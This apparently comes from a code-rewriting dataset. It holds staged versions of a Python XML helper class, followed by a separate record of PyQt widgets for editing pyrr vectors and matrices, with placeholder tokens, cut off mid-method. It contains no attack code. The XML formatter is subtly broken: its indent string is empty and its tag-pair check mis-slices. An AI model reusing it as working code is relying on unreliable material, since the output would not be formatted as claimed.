__analyNodeFlag(self, sourceStr):\n global _exception\n _exception = None\n try:\n nodeBegin = sourceStr.find('<')\n nodeEnd = str(sourceStr).find('>')\n if nodeBegin >= 0 and nodeEnd > 0:\n node = sourceStr[nodeBegin:nodeEnd + 1]\n nodeInnerText = sourceStr[nodeEnd + 1:]\n return [node, nodeInnerText]\n else:\n return ['', sourceStr]\n except BaseException as error:\n _exception = error\n return None\n\n def __checkNodeFlagIsPair(self, nodeFlag1, nodeFlag2):\n if len(nodeFlag1) > 0 and len(nodeFlag2) > 0:\n nodeFlag1 = nodeFlag1[1:len(nodeFlag1) - 2]\n nodeFlag2 = nodeFlag2[1:len(nodeFlag2) - 2]\n nodeFlag1 = nodeFlag1.replace('/', '')\n nodeFlag2 = nodeFlag2.replace('/', '')\n if nodeFlag1 == nodeFlag2:\n return True\n return False\n\n def __fetchNodeNameFromStr(self, str):\n str = str[1:len(str) - 1]\n nodeName = str.replace('/', '')\n return nodeName\n\n def modifyNodeValue(self, node, newValue, isAppend=False):\n if node == None:\n return False\n else:\n try:\n if isAppend:\n node.text += newValue\n else:\n node.text = newValue\n return True\n except:\n return False\n\n def writeXml(self, nodeTree, outPath, charset='utf-8'):\n global _exception\n _exception = None\n try:\n nodeTree.write(outPath, encoding=charset)\n return True\n except BaseException as error:\n _exception = error\n return False\n",
"step-4": "<mask token>\n_exception = None\n<mask token>\n\n\nclass xmlSp:\n\n def addNode(self, parentNode, childNode):\n parentNode.append(childNode)\n\n def createChildNode(self, key, value, propertyMap={}):\n element = Element(key, propertyMap)\n element.text = value\n return element\n\n def fetchXmlNodeTree(self, xmlPathOrXmlStr):\n if xmlPathOrXmlStr == '':\n return None\n elif os.path.isfile(xmlPathOrXmlStr):\n return ElementTree.parse(xmlPathOrXmlStr)\n else:\n return ElementTree.fromstring(xmlPathOrXmlStr)\n\n def fetchSingleNode(self, nodeTree, xpathOrKey):\n if xpathOrKey == None or xpathOrKey == '':\n return None\n elif len(xpathOrKey.split('/')) > 1:\n return nodeTree.find(xpathOrKey)\n else:\n nodeList = nodeTree.getiterator(xpathOrKey)\n if nodeList == None or len(nodeList) <= 0:\n return nodeList\n else:\n return nodeList[0]\n\n def fetchSingleNodeValue(self, nodeTree, xpathOrKey):\n node = self.fetchSingleNode(nodeTree, xpathOrKey)\n if node == None or len(node) <= 0 or node == '':\n return ''\n else:\n return node.text\n\n def fetchNodeList(self, nodeTree, xpathOrKey):\n if xpathOrKey == None or xpathOrKey == '':\n return None\n elif len(xpathOrKey.split('/')) > 1:\n return nodeTree.findall(xpathOrKey)\n else:\n return nodeTree.getiterator(xpathOrKey)\n\n def fetchNodeValueList(self, nodeTree, xpathOrKey, key=''):\n if xpathOrKey == None or xpathOrKey == '':\n return None\n else:\n nodeValueList = []\n nodeList = self.fetchNodeList(nodeTree, xpathOrKey)\n for node in nodeList:\n if node.tag == xpathOrKey:\n nodeValueList.append(node.text)\n return nodeValueList\n\n def format(self, sourceXmlPath, destXmlPath, charset='UTF-8'):\n global _exception\n _exception = None\n if os.path.exists(sourceXmlPath):\n try:\n fileRead = open(sourceXmlPath, 'r', encoding=charset)\n fileWrite = open(destXmlPath, 'w', encoding=charset)\n lines = fileRead.read()\n nodeList = []\n self.__writeXmlStruct(lines, nodeList, fileWrite)\n fileRead.close()\n fileWrite.close()\n return True\n except BaseException as error:\n _exception = error\n return False\n else:\n _exception = BaseException('File not exist!')\n return False\n\n def __writeXmlStruct(self, xmlStr, nodeList, fileWrite):\n xmlStr = xmlStr.replace('\\n', '')\n xmlStruct1 = self.__analyNodeFlag(xmlStr)\n if xmlStruct1 != None:\n xmlNode1 = xmlStruct1[0]\n xmlRestStr1 = xmlStruct1[1]\n xmlStruct2 = self.__analyNodeFlag(xmlRestStr1)\n xmlNode2 = xmlStruct2[0]\n xmlRestStr2 = xmlStruct2[1]\n xmlInnerTextEnd = xmlRestStr1.find(xmlNode2)\n xmlInnerText = xmlRestStr1[:xmlInnerTextEnd]\n isPair = self.__checkNodeFlagIsPair(xmlNode1, xmlNode2)\n nodeName1 = self.__fetchNodeNameFromStr(xmlNode1)\n nodeName2 = self.__fetchNodeNameFromStr(xmlNode2)\n if not nodeName1 in nodeList:\n nodeList.append(nodeName1)\n if not nodeName2 in nodeList:\n nodeList.append(nodeName2)\n nodeName1Floor = nodeList.index(nodeName1, 0)\n nodeName2Floor = nodeList.index(nodeName2, 0)\n space = ''\n if len(xmlNode1) > 0:\n if isPair:\n for index in range(nodeName1Floor):\n xmlNode1 = space + xmlNode1\n fileWrite.write(xmlNode1 + '\\n')\n if len(xmlInnerText) > 0:\n if isPair:\n for index in range(nodeName1Floor + 1):\n xmlInnerText = space + xmlInnerText\n fileWrite.write(xmlInnerText + '\\n')\n if len(xmlNode2) > 0:\n for index in range(nodeName2Floor):\n xmlNode2 = space + xmlNode2\n fileWrite.write(xmlNode2 + '\\n')\n self.__writeXmlStruct(xmlRestStr2, nodeList, fileWrite)\n\n def __analyNodeFlag(self, sourceStr):\n global _exception\n _exception = None\n try:\n nodeBegin = sourceStr.find('<')\n nodeEnd = str(sourceStr).find('>')\n if nodeBegin >= 0 and nodeEnd > 0:\n node = sourceStr[nodeBegin:nodeEnd + 1]\n nodeInnerText = sourceStr[nodeEnd + 1:]\n return [node, nodeInnerText]\n else:\n return ['', sourceStr]\n except BaseException as error:\n _exception = error\n return None\n\n def __checkNodeFlagIsPair(self, nodeFlag1, nodeFlag2):\n if len(nodeFlag1) > 0 and len(nodeFlag2) > 0:\n nodeFlag1 = nodeFlag1[1:len(nodeFlag1) - 2]\n nodeFlag2 = nodeFlag2[1:len(nodeFlag2) - 2]\n nodeFlag1 = nodeFlag1.replace('/', '')\n nodeFlag2 = nodeFlag2.replace('/', '')\n if nodeFlag1 == nodeFlag2:\n return True\n return False\n\n def __fetchNodeNameFromStr(self, str):\n str = str[1:len(str) - 1]\n nodeName = str.replace('/', '')\n return nodeName\n\n def modifyNodeValue(self, node, newValue, isAppend=False):\n if node == None:\n return False\n else:\n try:\n if isAppend:\n node.text += newValue\n else:\n node.text = newValue\n return True\n except:\n return False\n\n def writeXml(self, nodeTree, outPath, charset='utf-8'):\n global _exception\n _exception = None\n try:\n nodeTree.write(outPath, encoding=charset)\n return True\n except BaseException as error:\n _exception = error\n return False\n",
"step-5": "#-*- coding:utf-8 -*-\n\nfrom xml.etree import ElementTree\nfrom xml.etree.ElementTree import Element \n\n_exception = None\n\nimport os\nclass xmlSp: \n def addNode(self,parentNode,childNode): \n parentNode.append(childNode) \n \n def createChildNode(self,key,value,propertyMap={}):\n element = Element(key,propertyMap) \n element.text = value \n return element\n\n def fetchXmlNodeTree(self,xmlPathOrXmlStr):#Load xml has 2 ways.First:load xml string.Second:load xml file. \n if(xmlPathOrXmlStr == \"\"):\n return None\n elif(os.path.isfile(xmlPathOrXmlStr)):#is xmlPath\n return ElementTree.parse(xmlPathOrXmlStr)\n else:#is xmlStr\n return ElementTree.fromstring(xmlPathOrXmlStr) \n\n def fetchSingleNode(self,nodeTree,xpathOrKey):#If the node that is same name is more,return first node. \n if xpathOrKey == None or xpathOrKey == \"\":\n return None\n elif len(xpathOrKey.split('/')) > 1:#is xpath \n return nodeTree.find(xpathOrKey)#find is faster than findall then return first\n else:#is key\n nodeList = nodeTree.getiterator(xpathOrKey)\n if nodeList == None or len(nodeList) <= 0:\n return nodeList\n else:\n return nodeList[0]\n\n def fetchSingleNodeValue(self,nodeTree,xpathOrKey):#If the node that is same name is more,return first node. \n node = self.fetchSingleNode(nodeTree,xpathOrKey)\n if node == None or len(node) <= 0 or node == \"\":\n return \"\"\n else:\n return node.text\n\n def fetchNodeList(self,nodeTree,xpathOrKey):\n if xpathOrKey == None or xpathOrKey == \"\":\n return None\n elif len(xpathOrKey.split('/')) > 1:#is xpath\n return nodeTree.findall(xpathOrKey)\n else:#is key\n return nodeTree.getiterator(xpathOrKey)\n\n def fetchNodeValueList(self,nodeTree,xpathOrKey,key=\"\"):#If xpathOrKey is xpath,key must be not empty.Otherwise return empty set \n if xpathOrKey == None or xpathOrKey == \"\":\n return None\n else:\n nodeValueList = [] \n nodeList = self.fetchNodeList(nodeTree,xpathOrKey)\n for node in nodeList:\n if node.tag == xpathOrKey:\n nodeValueList.append(node.text)\n return nodeValueList \n\n def format(self,sourceXmlPath,destXmlPath,charset='UTF-8'): \n global _exception \n _exception = None\n if os.path.exists(sourceXmlPath):\n try:\n fileRead = open(sourceXmlPath,'r',encoding=charset)\n fileWrite = open(destXmlPath,'w',encoding=charset) \n lines = fileRead.read() \n nodeList=[] \n self.__writeXmlStruct(lines,nodeList,fileWrite) \n fileRead.close()\n fileWrite.close() \n return True\n except BaseException as error:\n _exception = error\n return False\n else:\n _exception = BaseException('File not exist!')\n return False\n def __writeXmlStruct(self,xmlStr,nodeList,fileWrite): \n xmlStr=xmlStr.replace('\\n','') \n xmlStruct1=self.__analyNodeFlag(xmlStr) \n if xmlStruct1!=None:\n xmlNode1=xmlStruct1[0]\n xmlRestStr1=xmlStruct1[1]\n xmlStruct2=self.__analyNodeFlag(xmlRestStr1)\n xmlNode2=xmlStruct2[0]\n xmlRestStr2=xmlStruct2[1]\n xmlInnerTextEnd=xmlRestStr1.find(xmlNode2)\n xmlInnerText=xmlRestStr1[:xmlInnerTextEnd]\n isPair=self.__checkNodeFlagIsPair(xmlNode1,xmlNode2)\n nodeName1=self.__fetchNodeNameFromStr(xmlNode1)\n nodeName2=self.__fetchNodeNameFromStr(xmlNode2)\n if not (nodeName1 in nodeList):\n nodeList.append(nodeName1)\n if not (nodeName2 in nodeList):\n nodeList.append(nodeName2)\n nodeName1Floor=nodeList.index(nodeName1,0)\n nodeName2Floor=nodeList.index(nodeName2,0) \n space=''\n if len(xmlNode1)>0: \n if isPair:\n for index in range(nodeName1Floor):\n xmlNode1=space+xmlNode1 \n fileWrite.write(xmlNode1+'\\n') \n if len(xmlInnerText)>0:\n if isPair:\n for index in range(nodeName1Floor+1):\n xmlInnerText=space+xmlInnerText\n fileWrite.write(xmlInnerText+'\\n')\n if len(xmlNode2)>0: \n for index in range(nodeName2Floor):\n xmlNode2=space+xmlNode2\n fileWrite.write(xmlNode2+'\\n') \n self.__writeXmlStruct(xmlRestStr2,nodeList,fileWrite) \n def __analyNodeFlag(self,sourceStr): \n global _exception\n _exception=None\n try: \n nodeBegin = sourceStr.find('<') \n nodeEnd = str(sourceStr).find('>') \n if nodeBegin >= 0 and nodeEnd > 0:\n node =sourceStr[nodeBegin:nodeEnd+1] \n nodeInnerText=sourceStr[nodeEnd+1:]\n return [node,nodeInnerText]\n else:\n return [\"\",sourceStr]\n except BaseException as error:\n _exception=error\n return None\n def __checkNodeFlagIsPair(self,nodeFlag1,nodeFlag2):\n if len(nodeFlag1)>0 and len(nodeFlag2)>0:\n nodeFlag1=nodeFlag1[1:(len(nodeFlag1)-2)]\n nodeFlag2=nodeFlag2[1:(len(nodeFlag2)-2)]\n nodeFlag1=nodeFlag1.replace('/','')\n nodeFlag2=nodeFlag2.replace('/','')\n if nodeFlag1==nodeFlag2:\n return True \n return False\n\n def __fetchNodeNameFromStr(self,str):\n str=str[1:(len(str)-1)]\n nodeName=str.replace('/','')\n return nodeName\n \n def modifyNodeValue(self,node,newValue, isAppend=False):\n if(node == None):\n return False\n else:\n try:\n if isAppend: \n node.text += newValue \n else: \n node.text = newValue \n return True \n except:\n return False\n\n def writeXml(self,nodeTree, outPath,charset=\"utf-8\"): \n global _exception\n _exception=None\n try:\n nodeTree.write(outPath, encoding=charset)\n return True\n except BaseException as error:\n _exception=error\n return False\n\n#import os \n#if __name__ == '__main__': \n# myxml = xmlSp() \n# formatResult = myxml.format(\"1.txt\",\"2.txt\")\n# if not formatResult:\n# print(_exception)\n# else:\n# os.remove(\"1.txt\")\n# os.rename('2.txt','1.txt')\n \n## xmlPath= \"..\\\\article\\\\articleList.xml\";\n## nodeTree = myxml.fetchXmlNodeTree(xmlPath)\n## #nodeTree=\n## #myxml.fetchXmlNodeTree(\"<artilceList><article><id>aaaa</id></article></artilceList>\")\n## #node=myxml.fetchSingleNode(nodeTree,'article/id')\n## #if len(node)<=0:\n## # print(\"empty\")\n## #print(node)\n## #nodeList = myxml.fetchNodeList(nodeTree,'id')\n## #myxml.modifyNodeValue(nodeList[0],'bbbb')\n## #myxml.writeXml(nodeTree,xmlPath)\n## #rootNode=myxml.fetchSingleNode(nodeTree,'articleList')\n## #idNode=myxml.createChildNode('id','aaabbbb')\n## #nameNode=myxml.createChildNode('name','aaabbbb')\n## #parentNode=myxml.createChildNode('article','')\n## #myxml.addNode(parentNode,idNode)\n## #myxml.addNode(parentNode,nameNode)\n## #myxml.addNode(rootNode,parentNode)\n## #myxml.writeXml(nodeTree,'aaa.xml')\n## #for node in nodeList:\n## # print(\"node:%s\" %node)\n## #nodeValueSet=fetchNodeValueSet(nodeTree,'article/id')\n## #for nodeValue in nodeValueSet:\n## # print (\"nodeValue:%s\" %nodeValue)\n#import os\n#os.system(\"PAUSE\")\n",
"step-ids": [
12,
13,
15,
16,
18
]
}
|
[
12,
13,
15,
16,
18
] |
<|reserved_special_token_0|>
class FloatVector3InputWidget(InputWidgetRaw, FloatVector3InputWidget_ui.
Ui_Form):
<|reserved_special_token_0|>
def __init__(self, **kwds):
super(FloatVector3InputWidget, self).__init__(**kwds)
self.setupUi(self)
self._configSpinBoxes()
self.dsbX.valueChanged.connect(self._onDataChangedX)
self.dsbY.valueChanged.connect(self._onDataChangedY)
self.dsbZ.valueChanged.connect(self._onDataChangedZ)
self.pbReset.clicked.connect(self.onResetValue)
def asDataTypeClass(self):
return pyrr.Vector3([self.dsbX.value(), self.dsbY.value(), self.
dsbZ.value()])
def _configSpinBoxes(self):
self.dsbX.setDecimals(FLOAT_DECIMALS)
self.dsbY.setDecimals(FLOAT_DECIMALS)
self.dsbZ.setDecimals(FLOAT_DECIMALS)
self.dsbX.setRange(FLOAT_RANGE_MIN, FLOAT_RANGE_MAX)
self.dsbY.setRange(FLOAT_RANGE_MIN, FLOAT_RANGE_MAX)
self.dsbZ.setRange(FLOAT_RANGE_MIN, FLOAT_RANGE_MAX)
self.dsbX.setSingleStep(FLOAT_SINGLE_STEP)
self.dsbY.setSingleStep(FLOAT_SINGLE_STEP)
self.dsbZ.setSingleStep(FLOAT_SINGLE_STEP)
def _onDataChangedX(self, val):
v = self.asDataTypeClass()
v.x = val
self.dataSetCallback(v)
def _onDataChangedY(self, val):
v = self.asDataTypeClass()
v.y = val
self.dataSetCallback(v)
def _onDataChangedZ(self, val):
v = self.asDataTypeClass()
v.z = val
self.dataSetCallback(v)
def setWidgetValue(self, val):
self.dsbX.setValue(val.x)
self.dsbY.setValue(val.y)
self.dsbZ.setValue(val.z)
class FloatVector4InputWidget(InputWidgetRaw, FloatVector4InputWidget_ui.
Ui_Form):
"""Vector4 data input widget"""
def __init__(self, **kwds):
super(FloatVector4InputWidget, self).__init__(**kwds)
self.setupUi(self)
self._configSpinBoxes()
self.dsbX.valueChanged.connect(self._onDataChangedX)
self.dsbY.valueChanged.connect(self._onDataChangedY)
self.dsbZ.valueChanged.connect(self._onDataChangedZ)
self.dsbW.valueChanged.connect(self._onDataChangedW)
self.pbReset.clicked.connect(self.onResetValue)
def asDataTypeClass(self):
return pyrr.Vector4([self.dsbX.value(), self.dsbY.value(), self.
dsbZ.value(), self.dsbW.value()])
def _configSpinBoxes(self):
self.dsbX.setRange(FLOAT_RANGE_MIN, FLOAT_RANGE_MAX)
self.dsbY.setRange(FLOAT_RANGE_MIN, FLOAT_RANGE_MAX)
self.dsbZ.setRange(FLOAT_RANGE_MIN, FLOAT_RANGE_MAX)
self.dsbW.setRange(FLOAT_RANGE_MIN, FLOAT_RANGE_MAX)
self.dsbX.setSingleStep(FLOAT_SINGLE_STEP)
self.dsbY.setSingleStep(FLOAT_SINGLE_STEP)
self.dsbZ.setSingleStep(FLOAT_SINGLE_STEP)
self.dsbW.setSingleStep(FLOAT_SINGLE_STEP)
self.dsbX.setDecimals(FLOAT_DECIMALS)
self.dsbY.setDecimals(FLOAT_DECIMALS)
self.dsbZ.setDecimals(FLOAT_DECIMALS)
self.dsbW.setDecimals(FLOAT_DECIMALS)
def _onDataChangedX(self, val):
v = self.asDataTypeClass()
v.x = val
self.dataSetCallback(v)
def _onDataChangedY(self, val):
v = self.asDataTypeClass()
v.y = val
self.dataSetCallback(v)
def _onDataChangedZ(self, val):
v = self.asDataTypeClass()
v.z = val
self.dataSetCallback(v)
def _onDataChangedW(self, val):
v = self.asDataTypeClass()
v.w = val
self.dataSetCallback(v)
def setWidgetValue(self, val):
self.dsbX.setValue(val.x)
self.dsbY.setValue(val.y)
self.dsbZ.setValue(val.z)
self.dsbW.setValue(val.w)
class QuatInputWidget(FloatVector4InputWidget):
"""Quaternion data input widget"""
def __init__(self, **kwds):
super(QuatInputWidget, self).__init__(**kwds)
def asDataTypeClass(self):
return pyrr.Quaternion([self.dsbX.value(), self.dsbY.value(), self.
dsbZ.value(), self.dsbW.value()])
class Matrix33InputWidget(InputWidgetRaw, Matrix33InputWidget_ui.Ui_Form):
"""Matrix33 data input widget"""
def __init__(self, parent=None, **kwds):
super(Matrix33InputWidget, self).__init__(parent=parent, **kwds)
self.setupUi(self)
self._configSpinBoxes()
self.dsbm11.valueChanged.connect(self.m11Changed)
self.dsbm12.valueChanged.connect(self.m12Changed)
self.dsbm13.valueChanged.connect(self.m13Changed)
self.dsbm21.valueChanged.connect(self.m21Changed)
self.dsbm22.valueChanged.connect(self.m22Changed)
self.dsbm23.valueChanged.connect(self.m23Changed)
self.dsbm31.valueChanged.connect(self.m31Changed)
self.dsbm32.valueChanged.connect(self.m32Changed)
self.dsbm33.valueChanged.connect(self.m33Changed)
self.pbReset.clicked.connect(self.onResetValue)
def asDataTypeClass(self):
return pyrr.Matrix33([[self.dsbm11.value(), self.dsbm12.value(),
self.dsbm13.value()], [self.dsbm21.value(), self.dsbm22.value(),
self.dsbm23.value()], [self.dsbm31.value(), self.dsbm32.value(),
self.dsbm33.value()]])
def _configSpinBoxes(self):
ls = [self.dsbm11, self.dsbm12, self.dsbm13, self.dsbm21, self.
dsbm22, self.dsbm23, self.dsbm31, self.dsbm32, self.dsbm33]
for sb in ls:
sb.setRange(FLOAT_RANGE_MIN, FLOAT_RANGE_MAX)
sb.setSingleStep(FLOAT_SINGLE_STEP)
sb.setDecimals(FLOAT_DECIMALS)
def m11Changed(self, val):
m = self.asDataTypeClass()
m.m11 = val
self.dataSetCallback(m)
def m12Changed(self, val):
m = self.asDataTypeClass()
m.m12 = val
self.dataSetCallback(m)
def m13Changed(self, val):
m = self.asDataTypeClass()
m.m13 = val
self.dataSetCallback(m)
def m21Changed(self, val):
m = self.asDataTypeClass()
m.m21 = val
self.dataSetCallback(m)
def m22Changed(self, val):
m = self.asDataTypeClass()
m.m22 = val
self.dataSetCallback(m)
def m23Changed(self, val):
m = self.asDataTypeClass()
m.m23 = val
self.dataSetCallback(m)
def m31Changed(self, val):
m = self.asDataTypeClass()
m.m31 = val
self.dataSetCallback(m)
def m32Changed(self, val):
m = self.asDataTypeClass()
m.m32 = val
self.dataSetCallback(m)
def m33Changed(self, val):
m = self.asDataTypeClass()
m.m33 = val
self.dataSetCallback(m)
def setWidgetValue(self, val):
self.dsbm11.setValue(val.m11)
self.dsbm12.setValue(val.m12)
self.dsbm13.setValue(val.m13)
self.dsbm21.setValue(val.m21)
self.dsbm22.setValue(val.m22)
self.dsbm23.setValue(val.m23)
self.dsbm31.setValue(val.m31)
self.dsbm32.setValue(val.m32)
self.dsbm33.setValue(val.m33)
class Matrix44InputWidget(InputWidgetRaw, Matrix44InputWidget_ui.Ui_Form):
"""Matrix44 data input widget"""
def __init__(self, parent=None, **kwds):
super(Matrix44InputWidget, self).__init__(parent=parent, **kwds)
self.setupUi(self)
self._configSpinBoxes()
self.dsbm11.valueChanged.connect(self.m11Changed)
self.dsbm12.valueChanged.connect(self.m12Changed)
self.dsbm13.valueChanged.connect(self.m13Changed)
self.dsbm14.valueChanged.connect(self.m14Changed)
self.dsbm21.valueChanged.connect(self.m21Changed)
self.dsbm22.valueChanged.connect(self.m22Changed)
self.dsbm23.valueChanged.connect(self.m23Changed)
self.dsbm24.valueChanged.connect(self.m24Changed)
self.dsbm31.valueChanged.connect(self.m31Changed)
self.dsbm32.valueChanged.connect(self.m32Changed)
self.dsbm33.valueChanged.connect(self.m33Changed)
self.dsbm34.valueChanged.connect(self.m34Changed)
self.dsbm41.valueChanged.connect(self.m41Changed)
self.dsbm42.valueChanged.connect(self.m42Changed)
self.dsbm43.valueChanged.connect(self.m43Changed)
self.dsbm44.valueChanged.connect(self.m44Changed)
self.pbReset.clicked.connect(self.onResetValue)
def asDataTypeClass(self):
return pyrr.Matrix44([[self.dsbm11.value(), self.dsbm12.value(),
self.dsbm13.value(), self.dsbm14.value()], [self.dsbm21.value(),
self.dsbm22.value(), self.dsbm23.value(), self.dsbm24.value()],
[self.dsbm31.value(), self.dsbm32.value(), self.dsbm33.value(),
self.dsbm34.value()], [self.dsbm41.value(), self.dsbm42.value(),
self.dsbm43.value(), self.dsbm44.value()]])
def _configSpinBoxes(self):
ls = [self.dsbm11, self.dsbm12, self.dsbm13, self.dsbm14, self.
dsbm21, self.dsbm22, self.dsbm23, self.dsbm24, self.dsbm31,
self.dsbm32, self.dsbm33, self.dsbm34, self.dsbm41, self.dsbm42,
self.dsbm43, self.dsbm44]
for sb in ls:
sb.setRange(FLOAT_RANGE_MIN, FLOAT_RANGE_MAX)
sb.setSingleStep(FLOAT_SINGLE_STEP)
sb.setDecimals(FLOAT_DECIMALS)
def m11Changed(self, val):
m = self.asDataTypeClass()
m.m11 = val
self.dataSetCallback(m)
def m12Changed(self, val):
m = self.asDataTypeClass()
m.m12 = val
self.dataSetCallback(m)
def m13Changed(self, val):
m = self.asDataTypeClass()
m.m13 = val
self.dataSetCallback(m)
def m14Changed(self, val):
m = self.asDataTypeClass()
m.m14 = val
self.dataSetCallback(m)
def m21Changed(self, val):
m = self.asDataTypeClass()
m.m21 = val
self.dataSetCallback(m)
def m22Changed(self, val):
m = self.asDataTypeClass()
m.m22 = val
self.dataSetCallback(m)
def m23Changed(self, val):
m = self.asDataTypeClass()
m.m23 = val
self.dataSetCallback(m)
def m24Changed(self, val):
m = self.asDataTypeClass()
m.m24 = val
self.dataSetCallback(m)
def m31Changed(self, val):
m = self.asDataTypeClass()
m.m31 = val
self.dataSetCallback(m)
def m32Changed(self, val):
m = self.asDataTypeClass()
m.m32 = val
self.dataSetCallback(m)
def m33Changed(self, val):
m = self.asDataTypeClass()
m.m33 = val
self.dataSetCallback(m)
def m34Changed(self, val):
m = self.asDataTypeClass()
m.m34 = val
self.dataSetCallback(m)
def m41Changed(self, val):
m = self.asDataTypeClass()
m.m41 = val
self.dataSetCallback(m)
def m42Changed(self, val):
m = self.asDataTypeClass()
m.m42 = val
self.dataSetCallback(m)
def m43Changed(self, val):
m = self.asDataTypeClass()
m.m43 = val
self.dataSetCallback(m)
def m44Changed(self, val):
m = self.asDataTypeClass()
m.m44 = val
self.dataSetCallback(m)
def setWidgetValue(self, val):
self.dsbm11.setValue(val.m11)
self.dsbm12.setValue(val.m12)
self.dsbm13.setValue(val.m13)
self.dsbm14.setValue(val.m14)
self.dsbm21.setValue(val.m21)
self.dsbm22.setValue(val.m22)
self.dsbm23.setValue(val.m23)
self.dsbm24.setValue(val.m24)
self.dsbm31.setValue(val.m31)
self.dsbm32.setValue(val.m32)
self.dsbm33.setValue(val.m33)
self.dsbm34.setValue(val.m34)
self.dsbm41.setValue(val.m41)
self.dsbm42.setValue(val.m42)
self.dsbm43.setValue(val.m43)
self.dsbm44.setValue(val.m44)
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
class FloatVector3InputWidget(InputWidgetRaw, FloatVector3InputWidget_ui.
Ui_Form):
"""Vector3 data input widget"""
def __init__(self, **kwds):
super(FloatVector3InputWidget, self).__init__(**kwds)
self.setupUi(self)
self._configSpinBoxes()
self.dsbX.valueChanged.connect(self._onDataChangedX)
self.dsbY.valueChanged.connect(self._onDataChangedY)
self.dsbZ.valueChanged.connect(self._onDataChangedZ)
self.pbReset.clicked.connect(self.onResetValue)
def asDataTypeClass(self):
return pyrr.Vector3([self.dsbX.value(), self.dsbY.value(), self.
dsbZ.value()])
def _configSpinBoxes(self):
self.dsbX.setDecimals(FLOAT_DECIMALS)
self.dsbY.setDecimals(FLOAT_DECIMALS)
self.dsbZ.setDecimals(FLOAT_DECIMALS)
self.dsbX.setRange(FLOAT_RANGE_MIN, FLOAT_RANGE_MAX)
self.dsbY.setRange(FLOAT_RANGE_MIN, FLOAT_RANGE_MAX)
self.dsbZ.setRange(FLOAT_RANGE_MIN, FLOAT_RANGE_MAX)
self.dsbX.setSingleStep(FLOAT_SINGLE_STEP)
self.dsbY.setSingleStep(FLOAT_SINGLE_STEP)
self.dsbZ.setSingleStep(FLOAT_SINGLE_STEP)
def _onDataChangedX(self, val):
v = self.asDataTypeClass()
v.x = val
self.dataSetCallback(v)
def _onDataChangedY(self, val):
v = self.asDataTypeClass()
v.y = val
self.dataSetCallback(v)
def _onDataChangedZ(self, val):
v = self.asDataTypeClass()
v.z = val
self.dataSetCallback(v)
def setWidgetValue(self, val):
self.dsbX.setValue(val.x)
self.dsbY.setValue(val.y)
self.dsbZ.setValue(val.z)
class FloatVector4InputWidget(InputWidgetRaw, FloatVector4InputWidget_ui.
Ui_Form):
"""Vector4 data input widget"""
def __init__(self, **kwds):
super(FloatVector4InputWidget, self).__init__(**kwds)
self.setupUi(self)
self._configSpinBoxes()
self.dsbX.valueChanged.connect(self._onDataChangedX)
self.dsbY.valueChanged.connect(self._onDataChangedY)
self.dsbZ.valueChanged.connect(self._onDataChangedZ)
self.dsbW.valueChanged.connect(self._onDataChangedW)
self.pbReset.clicked.connect(self.onResetValue)
def asDataTypeClass(self):
return pyrr.Vector4([self.dsbX.value(), self.dsbY.value(), self.
dsbZ.value(), self.dsbW.value()])
def _configSpinBoxes(self):
self.dsbX.setRange(FLOAT_RANGE_MIN, FLOAT_RANGE_MAX)
self.dsbY.setRange(FLOAT_RANGE_MIN, FLOAT_RANGE_MAX)
self.dsbZ.setRange(FLOAT_RANGE_MIN, FLOAT_RANGE_MAX)
self.dsbW.setRange(FLOAT_RANGE_MIN, FLOAT_RANGE_MAX)
self.dsbX.setSingleStep(FLOAT_SINGLE_STEP)
self.dsbY.setSingleStep(FLOAT_SINGLE_STEP)
self.dsbZ.setSingleStep(FLOAT_SINGLE_STEP)
self.dsbW.setSingleStep(FLOAT_SINGLE_STEP)
self.dsbX.setDecimals(FLOAT_DECIMALS)
self.dsbY.setDecimals(FLOAT_DECIMALS)
self.dsbZ.setDecimals(FLOAT_DECIMALS)
self.dsbW.setDecimals(FLOAT_DECIMALS)
def _onDataChangedX(self, val):
v = self.asDataTypeClass()
v.x = val
self.dataSetCallback(v)
def _onDataChangedY(self, val):
v = self.asDataTypeClass()
v.y = val
self.dataSetCallback(v)
def _onDataChangedZ(self, val):
v = self.asDataTypeClass()
v.z = val
self.dataSetCallback(v)
def _onDataChangedW(self, val):
v = self.asDataTypeClass()
v.w = val
self.dataSetCallback(v)
def setWidgetValue(self, val):
self.dsbX.setValue(val.x)
self.dsbY.setValue(val.y)
self.dsbZ.setValue(val.z)
self.dsbW.setValue(val.w)
class QuatInputWidget(FloatVector4InputWidget):
"""Quaternion data input widget"""
def __init__(self, **kwds):
super(QuatInputWidget, self).__init__(**kwds)
def asDataTypeClass(self):
return pyrr.Quaternion([self.dsbX.value(), self.dsbY.value(), self.
dsbZ.value(), self.dsbW.value()])
class Matrix33InputWidget(InputWidgetRaw, Matrix33InputWidget_ui.Ui_Form):
"""Matrix33 data input widget"""
def __init__(self, parent=None, **kwds):
super(Matrix33InputWidget, self).__init__(parent=parent, **kwds)
self.setupUi(self)
self._configSpinBoxes()
self.dsbm11.valueChanged.connect(self.m11Changed)
self.dsbm12.valueChanged.connect(self.m12Changed)
self.dsbm13.valueChanged.connect(self.m13Changed)
self.dsbm21.valueChanged.connect(self.m21Changed)
self.dsbm22.valueChanged.connect(self.m22Changed)
self.dsbm23.valueChanged.connect(self.m23Changed)
self.dsbm31.valueChanged.connect(self.m31Changed)
self.dsbm32.valueChanged.connect(self.m32Changed)
self.dsbm33.valueChanged.connect(self.m33Changed)
self.pbReset.clicked.connect(self.onResetValue)
def asDataTypeClass(self):
return pyrr.Matrix33([[self.dsbm11.value(), self.dsbm12.value(),
self.dsbm13.value()], [self.dsbm21.value(), self.dsbm22.value(),
self.dsbm23.value()], [self.dsbm31.value(), self.dsbm32.value(),
self.dsbm33.value()]])
def _configSpinBoxes(self):
ls = [self.dsbm11, self.dsbm12, self.dsbm13, self.dsbm21, self.
dsbm22, self.dsbm23, self.dsbm31, self.dsbm32, self.dsbm33]
for sb in ls:
sb.setRange(FLOAT_RANGE_MIN, FLOAT_RANGE_MAX)
sb.setSingleStep(FLOAT_SINGLE_STEP)
sb.setDecimals(FLOAT_DECIMALS)
def m11Changed(self, val):
m = self.asDataTypeClass()
m.m11 = val
self.dataSetCallback(m)
def m12Changed(self, val):
m = self.asDataTypeClass()
m.m12 = val
self.dataSetCallback(m)
def m13Changed(self, val):
m = self.asDataTypeClass()
m.m13 = val
self.dataSetCallback(m)
def m21Changed(self, val):
m = self.asDataTypeClass()
m.m21 = val
self.dataSetCallback(m)
def m22Changed(self, val):
m = self.asDataTypeClass()
m.m22 = val
self.dataSetCallback(m)
def m23Changed(self, val):
m = self.asDataTypeClass()
m.m23 = val
self.dataSetCallback(m)
def m31Changed(self, val):
